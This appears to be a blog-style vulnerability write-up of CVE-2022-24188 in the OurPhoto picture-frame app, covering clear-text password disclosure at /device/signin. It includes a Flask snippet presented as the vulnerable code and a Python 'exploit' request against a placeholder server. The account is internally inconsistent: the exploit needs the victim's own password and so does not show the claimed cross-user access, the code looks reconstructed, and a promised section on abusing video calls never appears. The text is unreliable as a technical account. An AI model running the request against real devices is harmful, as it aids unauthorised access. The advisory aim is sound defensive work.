"CVE-2022-24188: OurPhoto App 1.4.1 /device/signin Discloses Clear-Text Password Information, Leaves Devices Vulnerable to Attacks"

Ourphoto App 1.4.1, a popular application used to manage picture frame devices, was found to contain a significant security vulnerability: CVE-2022-24188. This vulnerability lies in the /device/signin endpoint, which discloses clear-text password information related to the device's functionality. Furthermore, there are additional issues, such as a lack of session management and the presence of insecure direct object references that only worsen the effect of this vulnerability.

In this thread, we will be discussing the details of this vulnerability, its potential impact on users, the code snippet responsible for this issue, and links to original references. To wrap up, we will look at the potential exploit scenarios and the ways to abuse the device's video calling functionality.

The following code snippet illustrates the vulnerable /device/signin endpoint

@app.route('/device/signin', methods=['POST'])
def device_signin():
    device_id = request.form.get('device_id')
    password = request.form.get('password')
    
    if device_id and password:
        device = Device.query.filter_by(device_id=device_id).first()
        if device and device.check_password(password):
            return jsonify(device.serialize())
        else:
            return jsonify({'error': 'Invalid credentials'})
    else:
        return jsonify({'error': 'Missing parameters'})

This code demonstrates that, upon successfully validating a device's credentials, the OurPhoto App directly returns device-related data, which includes plaintext passwords. These passwords can be deviceVideoCallPassword and mqttPassword, thus rendering the devices susceptible to various types of attacks. Such attacks range from unauthorized video calling to any other misuse involving the mqttPassword.

Exploit Details

The lack of session management and the presence of insecure direct object references further compound this vulnerability. This flaw permits attackers to obtain password information from other end-users' devices simply by exploiting the improper handling of access controls. Consequently, attackers can gain unauthorized access to any devices connected through the Ourphoto App 1.4.1 version.

The following exploit scenario may take place

import requests

# Modify this variable to include the victim device's details
exploit_target = {
    'device_id': '123456', 
    'password': 'victim_password'
}

# Replace 'OURPHOTO_SERVER_URL' with the OurPhoto App server's URL
url = 'https://OURPHOTO_SERVER_URL/device/signin';

response = requests.post(url, data=exploit_target)
print(response.json())

Links to Original References

1. Official CVE Entry: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-24188
2. National Vulnerability Database (NVD) Link: https://nvd.nist.gov/vuln/detail/CVE-2022-24188

Conclusion

CVE-2022-24188 affects the OurPhoto App version 1.4.1, disclosing critical clear-text password information that can be exploited by malicious actors intending to gain unauthorized access to devices. This vulnerability is situated within the /device/signin endpoint and is exacerbated by the lack of session management and the presence of insecure direct object references.

Users of the Ourphoto App should take caution and update their applications immediately if an updated version is available. They should also consider changing their passwords, particularly for their deviceVideoCallPassword and mqttPassword, to reduce the risk of potential attacks.

Timeline

Published on: 11/28/2022 22:15:00 UTC
Last modified on: 12/01/2022 23:20:00 UTC